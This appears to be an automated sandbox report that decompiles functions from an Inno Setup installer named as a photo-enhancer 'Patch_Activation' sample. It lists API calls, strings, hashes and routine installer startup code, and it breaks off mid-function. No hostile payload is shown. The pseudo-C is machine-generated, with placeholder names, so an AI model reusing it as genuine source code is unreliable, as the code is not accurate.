String ID: COMBOBOX$Inno Setup: Language
API String ID: 3391662889-4234151509
Opcode ID: 64aed83d7cd5fc135e30750f8cb7816a0e0a0640c1f8587c76686a23d2846c44
Instruction ID: 9a1e1fbd3c649eeeadcf20bc1b1a007eb45d24132bb8eba9a2a930841c17950d
Opcode Fuzzy Hash: 64aed83d7cd5fc135e30750f8cb7816a0e0a0640c1f8587c76686a23d2846c44
Instruction Fuzzy Hash: 64814E34A40605DFC710DF69C889AAAB7F5FB49304F1081BAE808DB762DB78AD45CB59

Uniqueness

Uniqueness Score: -1.00%

Function 00423B1C Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 96
windowCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E00423B1C(void* __ecx, char __edx, void* __edi) {
				char _v5;
				char _v261;
				void* __esi;
				void* __ebp;
				int _t29;
				struct HINSTANCE__* _t40;
				intOrPtr _t44;
				struct HINSTANCE__* _t46;
				void* _t52;
				char* _t54;
				int _t65;
				void* _t66;
				char _t68;
				void* _t78;
				void* _t80;
				void* _t81;

				_t78 = __edi;
				_t68 = __edx;
				_t66 = __ecx;
				if(__edx != 0) {
					_t81 = _t81 + 0xfffffff0;
					_t29 = E00402D30(_t29, _t80);
				}
				_v5 = _t68;
				_t65 = _t29;
				E004104C0(_t66, 0);
				 *((intOrPtr*)(_t65 + 0x70)) = E00402B30(1);
				 *((intOrPtr*)(_t65 + 0x80)) = E00402B30(1);
				 *((intOrPtr*)(_t65 + 0x40)) = 0;
				 *((intOrPtr*)(_t65 + 0x60)) = 0;
				 *((intOrPtr*)(_t65 + 0x3c)) = 0x80000018;
				 *((intOrPtr*)(_t65 + 0x54)) = 0x1f4;
				 *((intOrPtr*)(_t65 + 0x58)) = 0x32;
				 *((intOrPtr*)(_t65 + 0x5c)) = 0x9c4;
				 *((char*)(_t65 + 0x64)) = 0;
				 *((char*)(_t65 + 0x7d)) = 1;
				_t79 = E0041DEA4(1);
				 *((intOrPtr*)(_t65 + 0x78)) = _t39;
				_t40 =  *0x49e014; // 0x400000
				E0041E230(_t79, LoadIconA(_t40, "MAINICON"));
				_t13 = _t65 + 0x78; // 0xc23bc88b
				_t44 =  *_t13;
				 *((intOrPtr*)(_t44 + 8)) = _t65;
				 *((intOrPtr*)(_t44 + 4)) = 0x424f34;
				_t46 =  *0x49e014; // 0x400000
				GetModuleFileNameA(_t46,  &_v261, 0x100);
				OemToCharA( &_v261,  &_v261);
				_t52 = E00407950( &_v261, 0x5c);
				if(_t52 != 0) {
					_t20 = _t52 + 1; // 0x1
					E004077B8( &_v261, _t20);
				}
				_t54 = E00407930( &_v261, 0x2e);
				if(_t54 != 0) {
					 *_t54 = 0;
				}
				CharLowerA( &(( &_v261)[1]));
				_t24 = _t65 + 0x6c; // 0x41f2a0
				E0040355C(_t24, 0x100,  &_v261);
				if( *0x49e034 == 0) {
					E00423D04(_t65, _t78, _t79);
				}
				 *((char*)(_t65 + 0x39)) = 1;
				 *((char*)(_t65 + 0x3a)) = 1;
				if(_v5 != 0) {
					_pop( *[fs:0x0]);
				}
				return _t65;
			}

0x00423b1c
0x00423b1c
0x00423b1c
0x00423b29
0x00423b2b
0x00423b2e
0x00423b2e
0x00423b33
0x00423b36
0x00423b3c
0x00423b4d
0x00423b5c
0x00423b64
0x00423b69
0x00423b6c
0x00423b73
0x00423b7a
0x00423b81
0x00423b88
0x00423b8c
0x00423b9c
0x00423b9e
0x00423ba6
0x00423bb5
0x00423bba
0x00423bba
0x00423bbd
0x00423bc0
0x00423bd3
0x00423bd9
0x00423bec
0x00423bf9
0x00423c00
0x00423c02
0x00423c0b
0x00423c0b
0x00423c18
0x00423c1f
0x00423c21
0x00423c21
0x00423c2c
0x00423c31
0x00423c3f
0x00423c4b
0x00423c4f
0x00423c4f
0x00423c54
0x00423c58
0x00423c60
0x00423c62
0x00423c69
0x00423c73

APIs

LoadIconA.USER32(00400000,MAINICON), ref: 00423BAC
GetModuleFileNameA.KERNEL32(00400000,?,00000100,00400000,MAINICON,?,?,?,00419476,00000000,?,?,00000001,00000000), ref: 00423BD9
OemToCharA.USER32 ref: 00423BEC
CharLowerA.USER32(?,?,?,00400000,?,00000100,00400000,MAINICON,?,?,?,00419476,00000000,?,?,00000001), ref: 00423C2C

Strings

2, xrefs: 00423B7A
MAINICON, xrefs: 00423BA1

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: Char$FileIconLoadLowerModuleName
String ID: 2$MAINICON
API String ID: 3935243913-3181700818
Opcode ID: 1f82f7cb80c34b9ff5c46231264fdecee05270e1fe5ff3a7350c32b1cef790c9
Instruction ID: 9510fd107b4d1d478bc251de40ec4f21bd31917ac71a3749b9d0f73c54ce2f3c
Opcode Fuzzy Hash: 1f82f7cb80c34b9ff5c46231264fdecee05270e1fe5ff3a7350c32b1cef790c9
Instruction Fuzzy Hash: 1031C271A042549EDB10EF69D8C47C67BE8AF14308F4441BAE844DB293D7BEDA88CB55

Uniqueness

Uniqueness Score: -1.00%

Function 004193C8 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 55
threadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004193C8(void* __edi, void* __eflags) {
				char _v8;
				long _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v56;
				char _v60;
				short _t14;
				char _t15;
				intOrPtr _t22;
				intOrPtr _t25;
				intOrPtr _t27;
				intOrPtr _t29;

				_v24 = GetCurrentProcessId();
				_v20 = 0;
				_t14 = GlobalAddAtomA(E00407D50( &_v56,  &_v24, "Delphi%.8X", 0)); // executed
				 *0x49e5ca = _t14;
				_t15 =  *0x49e014; // 0x400000
				_v20 = _t15;
				_v16 = 0;
				_v12 = GetCurrentThreadId();
				_v8 = 0;
				 *0x49e5cc = GlobalAddAtomA(E00407D50( &_v60,  &_v20, "ControlOfs%.8X%.8X", 1));
				 *0x49e604 = E00402B30(1);
				_t22 =  *0x49e604; // 0x2250638
				E0040B858(_t22, 4);
				_t25 = E00423558(1); // executed
				 *0x49e630 = _t25;
				_t27 = E00423B1C(0, 1, __edi); // executed
				 *0x49e62c = _t27;
				E0041F5A8();
				_t29 =  *0x49e62c; // 0x2252410
				E00424D90(_t29, 1);
				E00406EB4(E00419398, 1);
				return E0040B23C(0x412eb0, 0x413d50, 0x413d84);
			}

0x004193d2
0x004193d6
0x004193ee
0x004193f3
0x004193fb
0x00419400
0x00419404
0x0041940e
0x00419412
0x0041942f
0x00419441
0x0041944b
0x00419450
0x0041945e
0x00419463
0x00419471
0x00419476
0x0041947b
0x00419482
0x00419487
0x00419491
0x004194ad

APIs

GetCurrentProcessId.KERNEL32(00000000), ref: 004193CD
GlobalAddAtomA.KERNEL32 ref: 004193EE
GetCurrentThreadId.KERNEL32 ref: 00419409
GlobalAddAtomA.KERNEL32 ref: 0041942A

Part of subcall function 00423558: GetDC.USER32(00000000), ref: 004235AE
Part of subcall function 00423558: EnumFontsA.GDI32(00000000,00000000,004234F8,004108F0,00000000,?,?,00000000,?,00419463,00000000,?,?,00000001,00000000), ref: 004235C1
Part of subcall function 00423558: GetDeviceCaps.GDI32(00000000,0000005A), ref: 004235C9
Part of subcall function 00423558: ReleaseDC.USER32 ref: 004235D4

Part of subcall function 00423B1C: LoadIconA.USER32(00400000,MAINICON), ref: 00423BAC
Part of subcall function 00423B1C: GetModuleFileNameA.KERNEL32(00400000,?,00000100,00400000,MAINICON,?,?,?,00419476,00000000,?,?,00000001,00000000), ref: 00423BD9
Part of subcall function 00423B1C: OemToCharA.USER32 ref: 00423BEC
Part of subcall function 00423B1C: CharLowerA.USER32(?,?,?,00400000,?,00000100,00400000,MAINICON,?,?,?,00419476,00000000,?,?,00000001), ref: 00423C2C

Part of subcall function 0041F5A8: GetVersion.KERNEL32(?,00419480,00000000,?,?,00000001,00000000), ref: 0041F5B6
Part of subcall function 0041F5A8: SetErrorMode.KERNEL32(00008000,?,00419480,00000000,?,?,00000001,00000000), ref: 0041F5D2
Part of subcall function 0041F5A8: LoadLibraryA.KERNEL32(CTL3D32.DLL,00008000,?,00419480,00000000,?,?,00000001,00000000), ref: 0041F5DE
Part of subcall function 0041F5A8: SetErrorMode.KERNEL32(00000000,CTL3D32.DLL,00008000,?,00419480,00000000,?,?,00000001,00000000), ref: 0041F5EC
Part of subcall function 0041F5A8: GetProcAddress.KERNEL32(00000001,Ctl3dRegister), ref: 0041F61C
Part of subcall function 0041F5A8: GetProcAddress.KERNEL32(00000001,Ctl3dUnregister), ref: 0041F645
Part of subcall function 0041F5A8: GetProcAddress.KERNEL32(00000001,Ctl3dSubclassCtl), ref: 0041F65A
Part of subcall function 0041F5A8: GetProcAddress.KERNEL32(00000001,Ctl3dSubclassDlgEx), ref: 0041F66F
Part of subcall function 0041F5A8: GetProcAddress.KERNEL32(00000001,Ctl3dDlgFramePaint), ref: 0041F684
Part of subcall function 0041F5A8: GetProcAddress.KERNEL32(00000001,Ctl3dCtlColorEx), ref: 0041F699
Part of subcall function 0041F5A8: GetProcAddress.KERNEL32(00000001,Ctl3dAutoSubclass), ref: 0041F6AE
Part of subcall function 0041F5A8: GetProcAddress.KERNEL32(00000001,Ctl3dUnAutoSubclass), ref: 0041F6C3
Part of subcall function 0041F5A8: GetProcAddress.KERNEL32(00000001,Ctl3DColorChange), ref: 0041F6D8
Part of subcall function 0041F5A8: GetProcAddress.KERNEL32(00000001,BtnWndProc3d), ref: 0041F6ED

Strings

ControlOfs%.8X%.8X, xrefs: 0041941B
Delphi%.8X, xrefs: 004193DF

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: AddressProc$AtomCharCurrentErrorGlobalLoadMode$CapsDeviceEnumFileFontsIconLibraryLowerModuleNameProcessReleaseThreadVersion
String ID: ControlOfs%.8X%.8X$Delphi%.8X
API String ID: 316262546-2767913252
Opcode ID: 01010ffcc25770325181b3a7c3472aaf3562720f676c53cb12d5d492de89c379
Instruction ID: 70937e91f797630ba3b8911ce9801afdb7ec3901755c8c3c4a5a11a92c11164f
Opcode Fuzzy Hash: 01010ffcc25770325181b3a7c3472aaf3562720f676c53cb12d5d492de89c379
Instruction Fuzzy Hash: 92111A706182409AC300FF76D94279E3BE09B64309F80953FF449A72A2DB3DAD458B5F

Uniqueness

Uniqueness Score: -1.00%

Function 00413ACC Relevance: 9.1, APIs: 6, Instructions: 60
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00413ACC(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				void* _t20;
				void* _t21;
				void* _t27;
				void* _t31;
				void* _t35;
				intOrPtr* _t43;

				_t43 =  &_v8;
				_t20 =  *0x49c2d8; // 0x0
				 *((intOrPtr*)(_t20 + 0xc0)) = _a4;
				_t21 =  *0x49c2d8; // 0x0
				SetWindowLongA(_a4, 0xfffffffc,  *(_t21 + 0xa8));
				if((GetWindowLongA(_a4, 0xfffffff0) & 0x40000000) != 0 && GetWindowLongA(_a4, 0xfffffff4) == 0) {
					SetWindowLongA(_a4, 0xfffffff4, _a4);
				}
				_t27 =  *0x49c2d8; // 0x0
				SetPropA(_a4,  *0x49e5cc & 0x0000ffff, _t27);
				_t31 =  *0x49c2d8; // 0x0
				SetPropA(_a4,  *0x49e5ca & 0x0000ffff, _t31);
				_t35 =  *0x49c2d8; // 0x0
				 *0x49c2d8 = 0; // executed
				_v8 =  *((intOrPtr*)(_t35 + 0xa8))(_a4, _a8, _a12, _a16);
				return  *_t43;
			}

0x00413ad1
0x00413ad4
0x00413adc
0x00413ae2
0x00413af4
0x00413b09
0x00413b24
0x00413b24
0x00413b29
0x00413b3b
0x00413b40
0x00413b52
0x00413b63
0x00413b69
0x00413b79
0x00413b81

APIs

SetWindowLongA.USER32 ref: 00413AF4
GetWindowLongA.USER32 ref: 00413AFF
GetWindowLongA.USER32 ref: 00413B11
SetWindowLongA.USER32 ref: 00413B24
SetPropA.USER32(?,00000000,00000000), ref: 00413B3B
SetPropA.USER32(?,00000000,00000000), ref: 00413B52

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: LongWindow$Prop
String ID:
API String ID: 3887896539-0
Opcode ID: 7ce4dc3fc8e6c19e22986d13dd13120370638c3e9722ee2c323b47d3b17dffc8
Instruction ID: ae8f1583d3b1519aebe57cde2a9c9bb5e562c2388428f51edfa5c09d84851558
Opcode Fuzzy Hash: 7ce4dc3fc8e6c19e22986d13dd13120370638c3e9722ee2c323b47d3b17dffc8
Instruction Fuzzy Hash: 8B11FC75500204BFCB00DFD9DC84E9A3BE8EB19364F104266B918DB2A2D738E990CB94

Uniqueness

Uniqueness Score: -1.00%

Function 0047EDD0 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 101
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E0047EDD0(long __ebx, void* __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				intOrPtr _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				intOrPtr _t43;
				int _t49;
				intOrPtr _t78;
				void* _t81;
				intOrPtr _t92;
				intOrPtr _t95;
				intOrPtr _t108;
				intOrPtr _t109;

				_t106 = __esi;
				_t105 = __edi;
				_t80 = __ebx;
				_t108 = _t109;
				_t81 = 5;
				do {
					_push(0);
					_push(0);
					_t81 = _t81 - 1;
				} while (_t81 != 0);
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_push(_t108);
				_push(0x47ef26);
				_push( *[fs:eax]);
				 *[fs:eax] = _t109;
				E00454220( &_v20, __ebx, __edx, __edi, __esi); // executed
				E00403450(0x49f190, _t80, _v20, _t105, _t106);
				E00403494( &_v20, "Created temporary directory: ");
				_t92 =  *0x49f190; // 0x23112b4
				E0040357C( &_v20, _t92);
				E004585A0(_v20, _t80, _t81, _t105, _t106);
				if( *0x49f010 != 0) {
					_t78 =  *0x49f190; // 0x23112b4
					E00457D98(_t78);
				}
				_t43 =  *0x49f190; // 0x23112b4
				E0042C88C(_t43,  &_v20);
				E004035C0( &_v8, "_isetup", _v20);
				_t49 = CreateDirectoryA(E00403738(_v8), 0); // executed
				if(_t49 == 0) {
					_t80 = GetLastError();
					E00451C30(0x36,  &_v36, _v8);
					_v32 = _v36;
					E004071F8(_t63,  &_v40);
					_v28 = _v40;
					E0042ED58(_t80,  &_v44);
					_v24 = _v44;
					E00451C00(0x68, 2,  &_v32,  &_v20);
					E0040909C(_v20, 1);
					E0040311C();
				}
				E00458CA0( &_v12);
				_t113 = _v12;
				if(_v12 != 0) {
					E004035C0( &_v16, "\\_setup64.tmp", _v8);
					E0047ED78(_v12, _t80, _v16, _t105, _t106, _t113); // executed
					E00458CE0(_v16);
				}
				_pop(_t95);
				 *[fs:eax] = _t95;
				_push(E0047EF2D);
				E00403420( &_v44, 3);
				return E00403420( &_v20, 4);
			}

0x0047edd0
0x0047edd0
0x0047edd0
0x0047edd1
0x0047edd3
0x0047edd8
0x0047edd8
0x0047edda
0x0047eddc
0x0047eddc
0x0047eddf
0x0047ede0
0x0047ede1
0x0047ede4
0x0047ede5
0x0047edea
0x0047eded
0x0047edf3
0x0047ee00
0x0047ee0d
0x0047ee15
0x0047ee1b
0x0047ee23
0x0047ee2f
0x0047ee31
0x0047ee36
0x0047ee36
0x0047ee3e
0x0047ee43
0x0047ee53
0x0047ee63
0x0047ee6a
0x0047ee71
0x0047ee7f
0x0047ee87
0x0047ee8f
0x0047ee97
0x0047ee9f
0x0047eea7
0x0047eeb4
0x0047eec3
0x0047eec8
0x0047eec8
0x0047eed0
0x0047eed5
0x0047eed9
0x0047eee6
0x0047eef1
0x0047eef9
0x0047eef9
0x0047ef00
0x0047ef03
0x0047ef06
0x0047ef13
0x0047ef25

APIs

CreateDirectoryA.KERNEL32(00000000,00000000,00000000,0047EF26,?,?,00000000,0049E62C,00000000,00000000,?,0049B3BD,00000000,0049B566,?,00000000), ref: 0047EE63
GetLastError.KERNEL32(00000000,00000000,00000000,0047EF26,?,?,00000000,0049E62C,00000000,00000000,?,0049B3BD,00000000,0049B566,?,00000000), ref: 0047EE6C

Strings

\_setup64.tmp, xrefs: 0047EEDE
Created temporary directory: , xrefs: 0047EE05
_isetup, xrefs: 0047EE4E

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID: Created temporary directory: $\_setup64.tmp$_isetup
API String ID: 1375471231-2952887711
Opcode ID: 5f75c24b460723fcdfba9950ec6282d6ab576ec79b10eebf27e30941102b1c05
Instruction ID: 86bef283ce988d733661aa3151468cc82572962b3dbe771d766a2fd360a5d677
Opcode Fuzzy Hash: 5f75c24b460723fcdfba9950ec6282d6ab576ec79b10eebf27e30941102b1c05
Instruction Fuzzy Hash: C6415674A001099BCB11FFA2D881ADEB7B9FF48305F50457BE404B7792DB38AE058B98

Uniqueness

Uniqueness Score: -1.00%

Function 00423F14 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00423F14(void* __eax, void* __ecx) {
				struct HWND__* _v16;
				int _t17;
				void* _t28;
				void* _t33;
				long _t34;

				_t28 = __eax;
				_t17 =  *0x49e62c; // 0x2252410
				if( *((intOrPtr*)(_t17 + 0x20)) != 0) {
					if( *((intOrPtr*)(__eax + 0x74)) == 0) {
						 *_t34 =  *((intOrPtr*)(__eax + 0x20));
						EnumWindows(E00423EAC, _t34); // executed
						_t17 =  *(_t28 + 0x70);
						if( *((intOrPtr*)(_t17 + 8)) != 0) {
							_v16 = GetWindow(_v16, 3);
							if((GetWindowLongA(_v16, 0xffffffec) & 0x00000008) != 0) {
								_v16 = 0xfffffffe;
							}
							_t17 =  *(_t28 + 0x70);
							_t33 =  *((intOrPtr*)(_t17 + 8)) - 1;
							if(_t33 >= 0) {
								do {
									_t12 =  &_v16; // 0x4245ec
									_t17 = SetWindowPos(E0040B6DC( *(_t28 + 0x70), _t33),  *_t12, 0, 0, 0, 0, 0x13);
									_t33 = _t33 - 1;
								} while (_t33 != 0xffffffff);
							}
						}
					}
					 *((intOrPtr*)(_t28 + 0x74)) =  *((intOrPtr*)(_t28 + 0x74)) + 1;
				}
				return _t17;
			}

0x00423f17
0x00423f19
0x00423f22
0x00423f28
0x00423f2d
0x00423f38
0x00423f3d
0x00423f44
0x00423f52
0x00423f63
0x00423f65
0x00423f65
0x00423f6c
0x00423f72
0x00423f76
0x00423f78
0x00423f82
0x00423f92
0x00423f97
0x00423f98
0x00423f78
0x00423f76
0x00423f44
0x00423f9d
0x00423f9d
0x00423fa3

APIs

EnumWindows.USER32(00423EAC), ref: 00423F38
GetWindow.USER32(?,00000003), ref: 00423F4D
GetWindowLongA.USER32 ref: 00423F5C
SetWindowPos.USER32(00000000,EB,00000000,00000000,00000000,00000000,00000013,?,000000EC,?,?,?,0042463B,?,?,00424203), ref: 00423F92

Strings

EB, xrefs: 00423F82, 00423F86

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: Window$EnumLongWindows
String ID: EB
API String ID: 4191631535-4058845024
Opcode ID: 7748721dd5b0c1bbec3d319649027a89b4350bc13e845d744e86a3b3b16a9e4e
Instruction ID: d60c47438ca5cb8406b8c3c26f1ac59805b97d32456ef5cb908caaf585e7f615
Opcode Fuzzy Hash: 7748721dd5b0c1bbec3d319649027a89b4350bc13e845d744e86a3b3b16a9e4e
Instruction Fuzzy Hash: E5115E71B04610AFDB109F28E989F5677F4EB08719F61066AF9649B2E2C378DC40CB58

Uniqueness

Uniqueness Score: -1.00%

Function 0046D0BC Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 320
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E0046D0BC(char __eax, void* __ebx, void* __edi, void* __esi, void* __fp0) {
				char _v8;
				intOrPtr _v12;
				char _v13;
				signed int _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				signed int _v36;
				char _v40;
				signed int _v44;
				signed int _t131;
				intOrPtr* _t139;
				void* _t146;
				void* _t154;
				intOrPtr _t160;
				intOrPtr _t164;
				intOrPtr _t172;
				intOrPtr* _t187;
				intOrPtr _t199;
				intOrPtr _t202;
				intOrPtr _t217;
				char _t218;
				intOrPtr _t240;
				void* _t256;
				intOrPtr _t259;
				intOrPtr _t271;
				intOrPtr _t277;
				void* _t293;
				void* _t294;
				intOrPtr _t295;
				void* _t307;

				_t307 = __fp0;
				_t291 = __esi;
				_t290 = __edi;
				_t244 = __ebx;
				_t293 = _t294;
				_t295 = _t294 + 0xffffffd8;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_v44 = 0;
				_v40 = 0;
				_v8 = __eax;
				_push(_t293);
				_push(0x46d5a1);
				_push( *[fs:eax]);
				 *[fs:eax] = _t295;
				_t131 =  *(_v8 + 0x344);
				if(_t131 == 0xc) {
					L45:
					_pop(_t259);
					 *[fs:eax] = _t259;
					_push(0x46d5a8);
					E00403400( &_v44);
					return E00403400( &_v40);
				} else {
					if(_t131 > 0xa) {
						L17:
						_v13 = 1;
						_t139 = E0046A1E4(_v8,  *(_v8 + 0x344), _t290);
						_t248 =  *_t139;
						 *((intOrPtr*)( *_t139 + 0x34))();
						if(_v13 != 0) {
							_t300 =  *0x49f490;
							if( *0x49f490 == 0) {
								L20:
								_v20 =  *(_v8 + 0x344);
								_v12 = E0046A120(_v8, _t244, _v20, _t290, _t291);
								do {
									_t146 = _v20 + 0xfffffffb;
									if(_t146 > 9) {
										L29:
										_v12 = _v12 + 1;
										_v20 =  *((intOrPtr*)(E0040B6DC( *((intOrPtr*)(_v8 + 0x2fc)), _v12) + 0x20));
										E0046C244(_v8, _v20, _t307);
										_t154 = _v20 - 0xb;
										if(_t154 == 0) {
											_v24 = 0;
											_v28 = 0;
											_push(_t293);
											_push(0x46d535);
											_push( *[fs:eax]);
											 *[fs:eax] = _t295;
											_v24 = E00402B30(1);
											_t160 =  *0x49f0ac; // 0x31f4d88
											E0046B36C(_t160, 0, _v24);
											_v28 = E00402B30(1);
											_t164 =  *0x49f0ac; // 0x31f4d88
											E0046B3FC(_t164, 0, _v28);
											_t251 = _v28;
											E0046B48C(_v8, _t244, _v28, _v24, _t290, _t291, __eflags, _t307,  &_v44);
											E00403450(_v8 + 0x348, _t244, _v44, _t290, _t291);
											_t172 = _v8;
											__eflags =  *((intOrPtr*)(_t172 + 0x348));
											if( *((intOrPtr*)(_t172 + 0x348)) == 0) {
												__eflags =  *0x49f3f8;
												if( *0x49f3f8 == 0) {
													__eflags = 0;
													_pop(_t271);
													 *[fs:eax] = _t271;
													_push(0x46d565);
													E00402B58(_v28);
													return E00402B58(_v24);
												} else {
													E0046C4D8(_v8, _t244, 0xb, _t290, _t291, _t307);
													E00414ED4( *((intOrPtr*)(_v8 + 0x1c0)), _t251, 0, _t290);
													E00414ED4( *((intOrPtr*)(_v8 + 0x1bc)), _t251, 0, _t290);
													__eflags =  *0x49f443 - 1;
													if( *0x49f443 == 1) {
														_t199 =  *0x49e62c; // 0x2252410
														SetActiveWindow( *(_t199 + 0x20));
														_t202 =  *0x49f0ac; // 0x31f4d88
														E00423294(_t202);
													}
													 *[fs:eax] = _t295;
													_t187 =  *0x49f0ac; // 0x31f4d88
													 *((intOrPtr*)( *_t187 + 0x50))( *[fs:eax], 0x46d510, _t293);
													E0046B834(_v8, _t244, _v28, _v24, _t290, _t291,  &_v44);
													__eflags = _v44;
													 *0x49f3f9 = _v44 != 0;
													__eflags =  *0x49f3f9;
													if( *0x49f3f9 == 0) {
														__eflags = 0;
														_pop(_t277);
														_pop(_t256);
														 *[fs:eax] = _t277;
														_push(0x46d517);
														return E0046C354(_v8, _t256, _t290, 0, _t307);
													} else {
														E004031BC();
														E004031BC();
														break;
													}
												}
											} else {
												_v36 =  *((intOrPtr*)(_v8 + 0x348));
												_v32 = 0xb;
												E004587AC("PrepareToInstall failed: %s", _t244, 0,  &_v36, _t290, _t291);
												_v36 =  *((intOrPtr*)(0x49cb14 + ( *(_v8 + 0x342) & 0x000000ff) * 4));
												_v32 = 0xb;
												E004587AC("Need to restart Windows? %s", _t244, 0,  &_v36, _t290, _t291);
												E004031BC();
												break;
											}
										} else {
											if(_t154 == 1) {
												goto L41;
											} else {
												goto L31;
											}
										}
									} else {
										switch( *((intOrPtr*)( *(_t146 + 0x46d245) * 4 +  &M0046D24F))) {
											case 0:
												goto L29;
											case 1:
												E00414F78( *((intOrPtr*)(_v8 + 0x2b0)),  &_v40, _t302);
												E00403450(0x49f3c0, _t244, _v40, _t290, _t291);
												E00414F78( *((intOrPtr*)(_v8 + 0x2b8)),  &_v40, _t302);
												E00403450(0x49f3c4, _t244, _v40, _t290, _t291);
												E00414F78( *((intOrPtr*)(_v8 + 0x2cc)),  &_v40, _t302);
												E00403450(0x49f3c8, _t244, _v40, _t290, _t291);
												goto L29;
											case 2:
												__edx =  &_v40;
												__eax = _v8;
												 *((intOrPtr*)(_v8 + 0x20c)) = E00414F78( *((intOrPtr*)(_v8 + 0x20c)),  &_v40, __eflags);
												__eax = _v40;
												__edx =  &_v44;
												__eax = E0042D050(_v40, __ecx,  &_v44, __eflags);
												__edx = _v44;
												__eax = 0x49f3cc;
												__eax = E00403450(0x49f3cc, __ebx, __edx, __edi, __esi);
												goto L29;
											case 3:
												__edx =  &_v40;
												__eax = _v8;
												 *((intOrPtr*)(_v8 + 0x210)) = E00414F78( *((intOrPtr*)(_v8 + 0x210)),  &_v40, __eflags);
												__eax = _v40;
												__edx =  &_v44;
												__eax = E0042D050(_v40, __ecx,  &_v44, __eflags);
												__edx = _v44;
												__eax = 0x49f3d0;
												__eax = E00403450(0x49f3d0, __ebx, __edx, __edi, __esi);
												goto L29;
											case 4:
												__eflags = _v20 - 0xb;
												if(_v20 != 0xb) {
													L28:
													__eax = _v8;
													 *((char*)(_v8 + 0x341)) = 1;
													__eflags = _v20 - 0xb;
													__edx = __edx & 0xffffff00 | _v20 == 0x0000000b;
													__eax =  *0x49f0f4; // 0x31f3828
													__eax = E0048594C(__eax, __ebx, __ecx, __edx, __edi, __esi);
													goto L45;
												} else {
													__eax = _v8;
